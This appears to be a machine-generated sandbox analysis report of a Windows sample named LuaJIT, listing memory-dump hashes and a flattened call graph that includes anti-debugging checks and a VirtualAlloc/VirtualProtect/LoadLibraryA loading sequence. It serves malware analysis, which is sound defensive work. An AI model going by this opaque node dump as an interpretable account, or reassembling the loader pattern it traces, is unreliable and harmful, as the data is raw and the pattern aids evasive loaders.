                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Valuetry_get_function
                                                      • String ID: FlsSetValue
                                                      • API String ID: 738293619-3750699315
                                                      • Opcode ID: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction ID: f65127856d303123a06710bdbe03fb4ab0d2bbbb51fc317ad392ea1372acea4f
                                                      • Opcode Fuzzy Hash: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction Fuzzy Hash: 4FE06561A08642D1FB04BB69F4404B9E271AF5A7CAFCC5136EB1D0639DCEBCE454C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0DF1F
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0DF83
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0DFB9
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0E003
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction ID: 62542b0c34f4c036b1288a1ce68eb5776dc3e4a81e7c7244bd6e2844874e1edf
                                                      • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction Fuzzy Hash: E0310D36618B8586DB609B1AE45126ABBA0F799B99F040166FFCD47B29CE6CC144CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.3%
                                                      Total number of Nodes:1491
                                                      Total number of Limit Nodes:31
13765->13766 13767 40e325 Sleep 13765->13767 13853 408389 13765->13853 13766->13701 13766->13702 13768 40e33a 13767->13768 13768->13765 13768->13766 13883 40f14b LeaveCriticalSection 13769->13883 13771 40f223 13771->13699 13773 416864 13772->13773 13774 41059b 13773->13774 13775 40d524 ___strgtold12_l 67 API calls 13773->13775 13774->13720 13774->13722 13776 416887 13775->13776 13777 40a597 ___strgtold12_l 6 API calls 13776->13777 13777->13774 13779 410da0 13778->13779 13780 410d99 13778->13780 13781 40d524 ___strgtold12_l 67 API calls 13779->13781 13780->13779 13784 410dc6 13780->13784 13786 410da5 13781->13786 13782 40a597 ___strgtold12_l 6 API calls 13783 410464 13782->13783 13783->13738 13787 40a46f 13783->13787 13784->13783 13785 40d524 ___strgtold12_l 67 API calls 13784->13785 13785->13786 13786->13782 13839 4082c0 13787->13839 13789 40a49c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13790 40a578 GetCurrentProcess TerminateProcess 13789->13790 13792 40a56c __invoke_watson 13789->13792 13841 40a7da 13790->13841 13792->13790 13793 40a595 13793->13738 13799 41486d 13794->13799 13795 414871 13796 40d524 ___strgtold12_l 67 API calls 13795->13796 13797 4104e9 13795->13797 13798 41488d 13796->13798 13797->13744 13797->13755 13800 40a597 ___strgtold12_l 6 API calls 13798->13800 13799->13795 13799->13797 13801 4148b7 13799->13801 13800->13797 13801->13797 13802 40d524 ___strgtold12_l 67 API calls 13801->13802 13802->13798 13804 4147ff 13803->13804 13807 4147f8 13803->13807 13805 40d524 ___strgtold12_l 67 API calls 13804->13805 13806 414804 13805->13806 13808 40a597 ___strgtold12_l 6 API calls 13806->13808 13807->13804 13810 414833 13807->13810 13809 41050f 13808->13809 13809->13750 13809->13752 13810->13809 13811 40d524 ___strgtold12_l 67 API calls 13810->13811 13811->13806 13813 410676 _raise 6 API calls 13812->13813 13814 4166fc 13813->13814 13815 41670f LoadLibraryA 13814->13815 13819 416797 13814->13819 13817 416724 GetProcAddress 
13815->13817 13818 416839 13815->13818 13816 4167c1 13822 41067f __decode_pointer 6 API calls 13816->13822 13836 4167ec 13816->13836 13817->13818 13820 41673a 13817->13820 13818->13759 13819->13816 13823 41067f __decode_pointer 6 API calls 13819->13823 13824 410604 __encode_pointer 6 API calls 13820->13824 13821 41067f __decode_pointer 6 API calls 13821->13818 13825 416804 13822->13825 13826 4167b4 13823->13826 13827 416740 GetProcAddress 13824->13827 13834 41067f __decode_pointer 6 API calls 13825->13834 13825->13836 13828 41067f __decode_pointer 6 API calls 13826->13828 13829 410604 __encode_pointer 6 API calls 13827->13829 13828->13816 13830 416755 GetProcAddress 13829->13830 13831 410604 __encode_pointer 6 API calls 13830->13831 13832 41676a GetProcAddress 13831->13832 13833 410604 __encode_pointer 6 API calls 13832->13833 13835 41677f 13833->13835 13834->13836 13835->13819 13837 416789 GetProcAddress 13835->13837 13836->13821 13838 410604 __encode_pointer 6 API calls 13837->13838 13838->13819 13840 4082cc __VEC_memzero 13839->13840 13840->13789 13842 40a7e2 13841->13842 13843 40a7e4 IsDebuggerPresent 13841->13843 13842->13793 13849 411415 13843->13849 13846 411e3a SetUnhandledExceptionFilter UnhandledExceptionFilter 13847 411e57 __invoke_watson 13846->13847 13848 411e5f GetCurrentProcess TerminateProcess 13846->13848 13847->13848 13848->13793 13849->13846 13851 41012e ExitProcess 13850->13851 13852 41011e GetProcAddress 13850->13852 13852->13851 13854 40843c 13853->13854 13864 40839b 13853->13864 13855 4105dc _realloc 6 API calls 13854->13855 13856 408442 13855->13856 13858 40d524 ___strgtold12_l 66 API calls 13856->13858 13857 410594 __FF_MSGBANNER 66 API calls 13862 4083ac 13857->13862 13870 408434 13858->13870 13860 4103e9 __NMSG_WRITE 66 API calls 13860->13862 13861 4083f8 RtlAllocateHeap 13861->13864 13862->13857 13862->13860 13863 410135 _malloc 3 API calls 13862->13863 13862->13864 13863->13862 13864->13861 13864->13862 13865 408428 13864->13865 13866 
4105dc _realloc 6 API calls 13864->13866 13868 40842d 13864->13868 13864->13870 13871 40833a 13864->13871 13867 40d524 ___strgtold12_l 66 API calls 13865->13867 13866->13864 13867->13868 13869 40d524 ___strgtold12_l 66 API calls 13868->13869 13869->13870 13870->13765 13872 408346 _raise 13871->13872 13873 408377 _raise 13872->13873 13874 40f225 __lock 67 API calls 13872->13874 13873->13864 13875 40835c 13874->13875 13876 40fa37 ___sbh_alloc_block 5 API calls 13875->13876 13877 408367 13876->13877 13879 408380 13877->13879 13882 40f14b LeaveCriticalSection 13879->13882 13881 408387 13881->13873 13882->13881 13883->13771 13885 40f5b1 HeapReAlloc 13884->13885 13886 40f5e5 HeapAlloc 13884->13886 13887 40f5d3 13885->13887 13890 40f5cf 13885->13890 13888 40f608 VirtualAlloc 13886->13888 13886->13890 13887->13886 13889 40f622 HeapFree 13888->13889 13888->13890 13889->13890 13890->13633 13892 40f665 VirtualAlloc 13891->13892 13894 40f6ac 13892->13894 13894->13637 13895->13640 13896->13573 13915 40f14b LeaveCriticalSection 13897->13915 13899 410802 13899->13583 13901 40c5d8 InterlockedIncrement 13900->13901 13902 40c5db 13900->13902 13901->13902 13903 40c5e5 InterlockedIncrement 13902->13903 13904 40c5e8 13902->13904 13903->13904 13905 40c5f2 InterlockedIncrement 13904->13905 13906 40c5f5 13904->13906 13905->13906 13907 40c5ff InterlockedIncrement 13906->13907 13909 40c602 13906->13909 13907->13909 13908 40c61b InterlockedIncrement 13908->13909 13909->13908 13910 40c636 InterlockedIncrement 13909->13910 13911 40c62b InterlockedIncrement 13909->13911 13910->13586 13911->13909 13916 40f14b LeaveCriticalSection 13912->13916 13914 410850 13914->13588 13915->13899 13916->13914 13917->13404 13919 4116ca 13918->13919 13922 411737 13919->13922 13928 417a8c 13919->13928 13921 411835 13921->13448 13921->13450 13922->13921 13923 417a8c 77 API calls _parse_cmdline 13922->13923 13923->13922 13925 4147d2 13924->13925 13926 4147d9 13924->13926 14150 41462f 13925->14150 13926->13444 13931 
417a39 13928->13931 13934 40d97b 13931->13934 13935 40d98e 13934->13935 13941 40d9db 13934->13941 13942 4108cb 13935->13942 13938 40d9bb 13938->13941 13962 41432a 13938->13962 13941->13919 13943 410852 __getptd_noexit 67 API calls 13942->13943 13944 4108d3 13943->13944 13945 40d993 13944->13945 13946 4100e1 __amsg_exit 67 API calls 13944->13946 13945->13938 13947 40c746 13945->13947 13946->13945 13948 40c752 _raise 13947->13948 13949 4108cb __getptd 67 API calls 13948->13949 13950 40c757 13949->13950 13951 40c785 13950->13951 13953 40c769 13950->13953 13952 40f225 __lock 67 API calls 13951->13952 13954 40c78c 13952->13954 13955 4108cb __getptd 67 API calls 13953->13955 13978 40c708 13954->13978 13958 40c76e 13955->13958 13960 40c77c _raise 13958->13960 13961 4100e1 __amsg_exit 67 API calls 13958->13961 13960->13938 13961->13960 13963 414336 _raise 13962->13963 13964 4108cb __getptd 67 API calls 13963->13964 13965 41433b 13964->13965 13966 41434d 13965->13966 13967 40f225 __lock 67 API calls 13965->13967 13969 41435b _raise 13966->13969 13971 4100e1 __amsg_exit 67 API calls 13966->13971 13968 41436b 13967->13968 13970 4143b4 13968->13970 13973 414382 InterlockedDecrement 13968->13973 13974 41439c InterlockedIncrement 13968->13974 13969->13941 14146 4143c5 13970->14146 13971->13969 13973->13974 13975 41438d 13973->13975 13974->13970 13975->13974 13976 40822f ___getlocaleinfo 67 API calls 13975->13976 13977 41439b 13976->13977 13977->13974 13979 40c70c 13978->13979 13985 40c73e 13978->13985 13980 40c5ba ___addlocaleref 8 API calls 13979->13980 13979->13985 13981 40c71f 13980->13981 13981->13985 13989 40c649 13981->13989 13986 40c7b0 13985->13986 14145 40f14b LeaveCriticalSection 13986->14145 13988 40c7b7 13988->13958 13990 40c65a InterlockedDecrement 13989->13990 13991 40c6dd 13989->13991 13992 40c672 13990->13992 13993 40c66f InterlockedDecrement 13990->13993 13991->13985 14003 40c471 13991->14003 13994 40c67c InterlockedDecrement 13992->13994 13995 40c67f 
13992->13995 13993->13992 13994->13995 13996 40c689 InterlockedDecrement 13995->13996 13997 40c68c 13995->13997 13996->13997 13998 40c696 InterlockedDecrement 13997->13998 13999 40c699 13997->13999 13998->13999 14000 40c6b2 InterlockedDecrement 13999->14000 14001 40c6c2 InterlockedDecrement 13999->14001 14002 40c6cd InterlockedDecrement 13999->14002 14000->13999 14001->13999 14002->13991 14004 40c488 14003->14004 14005 40c4f5 14003->14005 14004->14005 14011 40c4bc 14004->14011 14016 40822f ___getlocaleinfo 67 API calls 14004->14016 14006 40c542 14005->14006 14007 40822f ___getlocaleinfo 67 API calls 14005->14007 14022 40c569 14006->14022 14057 413993 14006->14057 14009 40c516 14007->14009 14013 40822f ___getlocaleinfo 67 API calls 14009->14013 14012 40c4dd 14011->14012 14019 40822f ___getlocaleinfo 67 API calls 14011->14019 14014 40822f ___getlocaleinfo 67 API calls 14012->14014 14018 40c529 14013->14018 14023 40c4ea 14014->14023 14015 40c5ae 14024 40822f ___getlocaleinfo 67 API calls 14015->14024 14025 40c4b1 14016->14025 14017 40822f ___getlocaleinfo 67 API calls 14017->14022 14021 40822f ___getlocaleinfo 67 API calls 14018->14021 14026 40c4d2 14019->14026 14020 40822f 67 API calls ___getlocaleinfo 14020->14022 14027 40c537 14021->14027 14022->14015 14022->14020 14028 40822f ___getlocaleinfo 67 API calls 14023->14028 14029 40c5b4 14024->14029 14033 413db0 14025->14033 14049 413ba1 14026->14049 14032 40822f ___getlocaleinfo 67 API calls 14027->14032 14028->14005 14029->13985 14032->14006 14034 413dbd 14033->14034 14048 413e3a 14033->14048 14035 413dce 14034->14035 14036 40822f ___getlocaleinfo 67 API calls 14034->14036 14037 413de0 14035->14037 14038 40822f ___getlocaleinfo 67 API calls 14035->14038 14036->14035 14039 40822f ___getlocaleinfo 67 API calls 14037->14039 14042 413df2 14037->14042 14038->14037 14039->14042 14040 413e04 14041 413e16 14040->14041 14044 40822f ___getlocaleinfo 67 API calls 14040->14044 14045 413e28 14041->14045 14046 40822f 
___getlocaleinfo 67 API calls 14041->14046 14042->14040 14043 40822f ___getlocaleinfo 67 API calls 14042->14043 14043->14040 14044->14041 14047 40822f ___getlocaleinfo 67 API calls 14045->14047 14045->14048 14046->14045 14047->14048 14048->14011 14050 413bae 14049->14050 14056 413be2 14049->14056 14051 413bbe 14050->14051 14052 40822f ___getlocaleinfo 67 API calls 14050->14052 14053 413bd0 14051->14053 14054 40822f ___getlocaleinfo 67 API calls 14051->14054 14052->14051 14055 40822f ___getlocaleinfo 67 API calls 14053->14055 14053->14056 14054->14053 14055->14056 14056->14012 14058 4139a4 14057->14058 14144 40c562 14057->14144 14059 40822f ___getlocaleinfo 67 API calls 14058->14059 14060 4139ac 14059->14060 14061 40822f ___getlocaleinfo 67 API calls 14060->14061 14062 4139b4 14061->14062 14063 40822f ___getlocaleinfo 67 API calls 14062->14063 14064 4139bc 14063->14064 14065 40822f ___getlocaleinfo 67 API calls 14064->14065 14066 4139c4 14065->14066 14067 40822f ___getlocaleinfo 67 API calls 14066->14067 14068 4139cc 14067->14068 14069 40822f ___getlocaleinfo 67 API calls 14068->14069 14070 4139d4 14069->14070 14071 40822f ___getlocaleinfo 67 API calls 14070->14071 14072 4139db 14071->14072 14073 40822f ___getlocaleinfo 67 API calls 14072->14073 14074 4139e3 14073->14074 14075 40822f ___getlocaleinfo 67 API calls 14074->14075 14076 4139eb 14075->14076 14077 40822f ___getlocaleinfo 67 API calls 14076->14077 14078 4139f3 14077->14078 14079 40822f ___getlocaleinfo 67 API calls 14078->14079 14080 4139fb 14079->14080 14081 40822f ___getlocaleinfo 67 API calls 14080->14081 14082 413a03 14081->14082 14083 40822f ___getlocaleinfo 67 API calls 14082->14083 14084 413a0b 14083->14084 14085 40822f ___getlocaleinfo 67 API calls 14084->14085 14086 413a13 14085->14086 14087 40822f ___getlocaleinfo 67 API calls 14086->14087 14088 413a1b 14087->14088 14089 40822f ___getlocaleinfo 67 API calls 14088->14089 14090 413a23 14089->14090 14091 40822f ___getlocaleinfo 67 API calls 
14090->14091 14092 413a2e 14091->14092 14093 40822f ___getlocaleinfo 67 API calls 14092->14093 14094 413a36 14093->14094 14095 40822f ___getlocaleinfo 67 API calls 14094->14095 14096 413a3e 14095->14096 14097 40822f ___getlocaleinfo 67 API calls 14096->14097 14098 413a46 14097->14098 14099 40822f ___getlocaleinfo 67 API calls 14098->14099 14100 413a4e 14099->14100 14101 40822f ___getlocaleinfo 67 API calls 14100->14101 14102 413a56 14101->14102 14103 40822f ___getlocaleinfo 67 API calls 14102->14103 14104 413a5e 14103->14104 14105 40822f ___getlocaleinfo 67 API calls 14104->14105 14106 413a66 14105->14106 14107 40822f ___getlocaleinfo 67 API calls 14106->14107 14108 413a6e 14107->14108 14109 40822f ___getlocaleinfo 67 API calls 14108->14109 14110 413a76 14109->14110 14111 40822f ___getlocaleinfo 67 API calls 14110->14111 14112 413a7e 14111->14112 14113 40822f ___getlocaleinfo 67 API calls 14112->14113 14114 413a86 14113->14114 14115 40822f ___getlocaleinfo 67 API calls 14114->14115 14116 413a8e 14115->14116 14117 40822f ___getlocaleinfo 67 API calls 14116->14117 14118 413a96 14117->14118 14119 40822f ___getlocaleinfo 67 API calls 14118->14119 14120 413a9e 14119->14120 14121 40822f ___getlocaleinfo 67 API calls 14120->14121 14122 413aa6 14121->14122 14123 40822f ___getlocaleinfo 67 API calls 14122->14123 14124 413ab4 14123->14124 14125 40822f ___getlocaleinfo 67 API calls 14124->14125 14126 413abf 14125->14126 14127 40822f ___getlocaleinfo 67 API calls 14126->14127 14128 413aca 14127->14128 14129 40822f ___getlocaleinfo 67 API calls 14128->14129 14130 413ad5 14129->14130 14131 40822f ___getlocaleinfo 67 API calls 14130->14131 14132 413ae0 14131->14132 14133 40822f ___getlocaleinfo 67 API calls 14132->14133 14134 413aeb 14133->14134 14135 40822f ___getlocaleinfo 67 API calls 14134->14135 14136 413af6 14135->14136 14137 40822f ___getlocaleinfo 67 API calls 14136->14137 14138 413b01 14137->14138 14139 40822f ___getlocaleinfo 67 API calls 14138->14139 14140 413b0c 
14139->14140 14141 40822f ___getlocaleinfo 67 API calls 14140->14141 14142 413b17 14141->14142 14143 40822f ___getlocaleinfo 67 API calls 14142->14143 14143->14144 14144->14017 14145->13988 14149 40f14b LeaveCriticalSection 14146->14149 14148 4143cc 14148->13966 14149->14148 14151 41463b _raise 14150->14151 14152 4108cb __getptd 67 API calls 14151->14152 14153 414644 14152->14153 14154 41432a _LocaleUpdate::_LocaleUpdate 69 API calls 14153->14154 14155 41464e 14154->14155 14181 4143ce 14155->14181 14158 40e305 __malloc_crt 67 API calls 14159 41466f 14158->14159 14160 41478e _raise 14159->14160 14188 41444a 14159->14188 14160->13926 14163 41479b 14163->14160 14168 4147ae 14163->14168 14169 40822f ___getlocaleinfo 67 API calls 14163->14169 14164 41469f InterlockedDecrement 14165 4146c0 InterlockedIncrement 14164->14165 14166 4146af 14164->14166 14165->14160 14167 4146d6 14165->14167 14166->14165 14171 40822f ___getlocaleinfo 67 API calls 14166->14171 14167->14160 14173 40f225 __lock 67 API calls 14167->14173 14170 40d524 ___strgtold12_l 67 API calls 14168->14170 14169->14168 14170->14160 14172 4146bf 14171->14172 14172->14165 14175 4146ea InterlockedDecrement 14173->14175 14176 414766 14175->14176 14177 414779 InterlockedIncrement 14175->14177 14176->14177 14179 40822f ___getlocaleinfo 67 API calls 14176->14179 14198 414790 14177->14198 14180 414778 14179->14180 14180->14177 14182 40d97b _LocaleUpdate::_LocaleUpdate 77 API calls 14181->14182 14183 4143e2 14182->14183 14184 41440b 14183->14184 14185 4143ed GetOEMCP 14183->14185 14186 414410 GetACP 14184->14186 14187 4143fd 14184->14187 14185->14187 14186->14187 14187->14158 14187->14160 14189 4143ce getSystemCP 79 API calls 14188->14189 14190 41446a 14189->14190 14191 414475 setSBCS 14190->14191 14194 4144b9 IsValidCodePage 14190->14194 14197 4144de _memset __setmbcp_nolock 14190->14197 14192 40a7da ___getlocaleinfo 5 API calls 14191->14192 14193 41462d 14192->14193 14193->14163 14193->14164 14194->14191 14195 4144cb 
GetCPInfo 14194->14195 14195->14191 14195->14197 14201 414197 GetCPInfo 14197->14201 14334 40f14b LeaveCriticalSection 14198->14334 14200 414797 14200->14160 14203 4141cb _memset 14201->14203 14210 41427d 14201->14210 14211 415276 14203->14211 14205 40a7da ___getlocaleinfo 5 API calls 14207 414328 14205->14207 14207->14197 14209 40dda7 ___crtLCMapStringA 102 API calls 14209->14210 14210->14205 14212 40d97b _LocaleUpdate::_LocaleUpdate 77 API calls 14211->14212 14213 415289 14212->14213 14221 4150bc 14213->14221 14216 40dda7 14217 40d97b _LocaleUpdate::_LocaleUpdate 77 API calls 14216->14217 14218 40ddba 14217->14218 14287 40da02 14218->14287 14222 415108 14221->14222 14223 4150dd GetStringTypeW 14221->14223 14224 4150f5 14222->14224 14226 4151ef 14222->14226 14223->14224 14225 4150fd GetLastError 14223->14225 14227 415141 MultiByteToWideChar 14224->14227 14235 4151e9 14224->14235 14225->14222 14249 41554e GetLocaleInfoA 14226->14249 14231 41516e 14227->14231 14227->14235 14229 40a7da ___getlocaleinfo 5 API calls 14230 414238 14229->14230 14230->14216 14237 408389 _malloc 67 API calls 14231->14237 14243 415183 _memset __crtGetLocaleInfoA_stat 14231->14243 14232 415240 GetStringTypeA 14232->14235 14236 41525b 14232->14236 14234 4151bc MultiByteToWideChar 14240 4151e3 14234->14240 14241 4151d2 GetStringTypeW 14234->14241 14235->14229 14242 40822f ___getlocaleinfo 67 API calls 14236->14242 14237->14243 14245 40d95b 14240->14245 14241->14240 14242->14235 14243->14234 14243->14235 14246 40d967 14245->14246 14247 40d978 14245->14247 14246->14247 14248 40822f ___getlocaleinfo 67 API calls 14246->14248 14247->14235 14248->14247 14250 415581 14249->14250 14251 41557c 14249->14251 14280 4186af 14250->14280 14253 40a7da ___getlocaleinfo 5 API calls 14251->14253 14254 415213 14253->14254 14254->14232 14254->14235 14255 415597 14254->14255 14256 4155d7 GetCPInfo 14255->14256 14272 415661 14255->14272 14257 41564c MultiByteToWideChar 14256->14257 14258 4155ee 14256->14258 14263 
415607 _strlen 14257->14263 14257->14272 14258->14257 14260 4155f4 GetCPInfo 14258->14260 14259 40a7da ___getlocaleinfo 5 API calls 14261 415234 14259->14261 14260->14257 14262 415601 14260->14262 14261->14232 14261->14235 14262->14257 14262->14263 14264 408389 _malloc 67 API calls 14263->14264 14268 415639 _memset __crtGetLocaleInfoA_stat 14263->14268 14264->14268 14265 415696 MultiByteToWideChar 14266 4156cd 14265->14266 14267 4156ae 14265->14267 14269 40d95b __freea 67 API calls 14266->14269 14270 4156d2 14267->14270 14271 4156b5 WideCharToMultiByte 14267->14271 14268->14265 14268->14272 14269->14272 14273 4156f1 14270->14273 14274 4156dd WideCharToMultiByte 14270->14274 14271->14266 14272->14259 14275 40e34a __calloc_crt 67 API calls 14273->14275 14274->14266 14274->14273 14276 4156f9 14275->14276 14276->14266 14277 415702 WideCharToMultiByte 14276->14277 14277->14266 14278 415714 14277->14278 14279 40822f ___getlocaleinfo 67 API calls 14278->14279 14279->14266 14283 41ab13 14280->14283 14284 41ab2c 14283->14284 14285 41a8e4 strtoxl 91 API calls 14284->14285 14286 4186c0 14285->14286 14286->14251 14288 40da23 LCMapStringW 14287->14288 14292 40da3e 14287->14292 14289 40da46 GetLastError 14288->14289 14288->14292 14289->14292 14290 40dc3c 14294 41554e ___ansicp 91 API calls 14290->14294 14291 40da98 14293 40dab1 MultiByteToWideChar 14291->14293 14315 40dc33 14291->14315 14292->14290 14292->14291 14302 40dade 14293->14302 14293->14315 14296 40dc64 14294->14296 14295 40a7da ___getlocaleinfo 5 API calls 14297 40dda5 14295->14297 14298 40dd58 LCMapStringA 14296->14298 14299 40dc7d 14296->14299 14296->14315 14297->14209 14333 40dcb4 14298->14333 14300 415597 ___convertcp 74 API calls 14299->14300 14304 40dc8f 14300->14304 14301 40db2f MultiByteToWideChar 14305 40db48 LCMapStringW 14301->14305 14306 40dc2a 14301->14306 14303 408389 _malloc 67 API calls 14302->14303 14312 40daf7 __crtGetLocaleInfoA_stat 14302->14312 14303->14312 14308 40dc99 LCMapStringA 14304->14308 
14304->14315 14305->14306 14310 40db69 14305->14310 14309 40d95b __freea 67 API calls 14306->14309 14307 40dd7f 14314 40822f ___getlocaleinfo 67 API calls 14307->14314 14307->14315 14318 40dcbb 14308->14318 14308->14333 14309->14315 14313 40db72 14310->14313 14317 40db9b 14310->14317 14311 40822f ___getlocaleinfo 67 API calls 14311->14307 14312->14301 14312->14315 14313->14306 14316 40db84 LCMapStringW 14313->14316 14314->14315 14315->14295 14316->14306 14320 40dbb6 __crtGetLocaleInfoA_stat 14317->14320 14322 408389 _malloc 67 API calls 14317->14322 14321 40dccc _memset __crtGetLocaleInfoA_stat 14318->14321 14323 408389 _malloc 67 API calls 14318->14323 14319 40dbea LCMapStringW 14324 40dc02 WideCharToMultiByte 14319->14324 14325 40dc24 14319->14325 14320->14306 14320->14319 14327 40dd0a LCMapStringA 14321->14327 14321->14333 14322->14320 14323->14321 14324->14325 14326 40d95b __freea 67 API calls 14325->14326 14326->14306 14328 40dd26 14327->14328 14329 40dd2a 14327->14329 14332 40d95b __freea 67 API calls 14328->14332 14331 415597 ___convertcp 74 API calls 14329->14331 14331->14328 14332->14333 14333->14307 14333->14311 14334->14200 14336 40efcc 14335->14336 14337 410604 __encode_pointer 6 API calls 14336->14337 14338 40efe4 14336->14338 14337->14336 14338->13471 14342 40b486 14339->14342 14341 40b4cf 14341->13473 14343 40b492 _raise 14342->14343 14350 41014d 14343->14350 14349 40b4b3 _raise 14349->14341 14351 40f225 __lock 67 API calls 14350->14351 14352 40b497 14351->14352 14353 40b39b 14352->14353 14354 41067f __decode_pointer 6 API calls 14353->14354 14355 40b3af 14354->14355 14356 41067f __decode_pointer 6 API calls 14355->14356 14357 40b3bf 14356->14357 14366 40b442 14357->14366 14373 413212 14357->14373 14359 40b429 14360 410604 __encode_pointer 6 API calls 14359->14360 14362 40b437 14360->14362 14361 40b3dd 14361->14359 14363 40b401 14361->14363 14386 40e396 14361->14386 14364 410604 __encode_pointer 6 API calls 14362->14364 14363->14366 14367 40e396 
__realloc_crt 73 API calls 14363->14367 14368 40b417 14363->14368 14364->14366 14370 40b4bc 14366->14370 14367->14368 14368->14366 14369 410604 __encode_pointer 6 API calls 14368->14369 14369->14359 14435 410156 14370->14435 14374 41321e _raise 14373->14374 14375 41324b 14374->14375 14376 41322e 14374->14376 14377 41328c HeapSize 14375->14377 14379 40f225 __lock 67 API calls 14375->14379 14378 40d524 ___strgtold12_l 67 API calls 14376->14378 14382 413243 _raise 14377->14382 14380 413233 14378->14380 14383 41325b ___sbh_find_block 14379->14383 14381 40a597 ___strgtold12_l 6 API calls 14380->14381 14381->14382 14382->14361 14391 4132ac 14383->14391 14388 40e39f 14386->14388 14389 40e3de 14388->14389 14390 40e3bf Sleep 14388->14390 14395 415abc 14388->14395 14389->14363 14390->14388 14394 40f14b LeaveCriticalSection 14391->14394 14393 413287 14393->14377 14393->14382 14394->14393 14396 415ac8 _raise 14395->14396 14397 415add 14396->14397 14398 415acf 14396->14398 14400 415af0 14397->14400 14401 415ae4 14397->14401 14399 408389 _malloc 67 API calls 14398->14399 14403 415ad7 _raise _realloc 14399->14403 14409 415c62 14400->14409 14429 415afd _realloc ___sbh_resize_block ___sbh_find_block 14400->14429 14402 40822f ___getlocaleinfo 67 API calls 14401->14402 14402->14403 14403->14388 14404 415c95 14405 4105dc _realloc 6 API calls 14404->14405 14408 415c9b 14405->14408 14406 40f225 __lock 67 API calls 14406->14429 14407 415c67 HeapReAlloc 14407->14403 14407->14409 14410 40d524 ___strgtold12_l 67 API calls 14408->14410 14409->14404 14409->14407 14411 415cb9 14409->14411 14412 4105dc _realloc 6 API calls 14409->14412 14415 415caf 14409->14415 14410->14403 14411->14403 14413 40d524 ___strgtold12_l 67 API calls 14411->14413 14412->14409 14416 415cc2 GetLastError 14413->14416 14417 40d524 ___strgtold12_l 67 API calls 14415->14417 14416->14403 14419 415c30 14417->14419 14418 415b88 HeapAlloc 14418->14429 14419->14403 14421 415c35 GetLastError 14419->14421 14420 415bdd HeapReAlloc 
14420->14429 14421->14403 14422 40fa37 ___sbh_alloc_block 5 API calls 14422->14429 14423 415c48 14423->14403 14425 40d524 ___strgtold12_l 67 API calls 14423->14425 14424 4105dc _realloc 6 API calls 14424->14429 14426 415c55 14425->14426 14426->14403 14426->14416 14427 415c2b 14428 40d524 ___strgtold12_l 67 API calls 14427->14428 14428->14419 14429->14403 14429->14404 14429->14406 14429->14418 14429->14420 14429->14422 14429->14423 14429->14424 14429->14427 14430 40f288 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 14429->14430 14431 415c00 14429->14431 14430->14429 14434 40f14b LeaveCriticalSection 14431->14434 14433 415c07 14433->14429 14434->14433 14438 40f14b LeaveCriticalSection 14435->14438 14437 40b4c1 14437->14349 14438->14437 14440 41e182 14439->14440 14442 41e196 14439->14442 14441 4039b0 77 API calls 14440->14441 14441->14442 14442->13493 14444 41dbbb 14443->14444 14445 408389 _malloc 67 API calls 14444->14445 14452 41e0a9 14444->14452 14446 41ded1 14445->14446 14446->14452 14474 41d910 14446->14474 14448 41df6a _memset 14449 40822f ___getlocaleinfo 67 API calls 14448->14449 14450 41e08d 14449->14450 14478 41c000 14450->14478 14452->13494 14455 4039e2 std::locale::_Init 14453->14455 14498 403080 14455->14498 14456 403a46 std::ios_base::width 14503 402a00 14456->14503 14461 402560 14462 403080 76 API calls 14461->14462 14463 402598 14462->14463 14473 4025d5 14463->14473 14682 402780 14463->14682 14465 402a00 75 API calls 14467 4026a3 14465->14467 14469 403120 76 API calls 14467->14469 14471 4026b1 14469->14471 14471->13501 14473->14465 14475 41d967 14474->14475 14476 41d971 14475->14476 14477 41dac8 GetModuleHandleA GetProcAddress VirtualProtect 14475->14477 14476->14448 14477->14448 14479 41c00e 14478->14479 14480 41c31b 14479->14480 14481 41c367 VirtualAlloc 14479->14481 14480->14452 14484 41c394 14481->14484 14482 41cb51 LoadLibraryA 14483 41cb8e 14482->14483 14482->14484 14485 41cbde GetProcAddress 14483->14485 14488 41cc70 

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 0041C37F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp
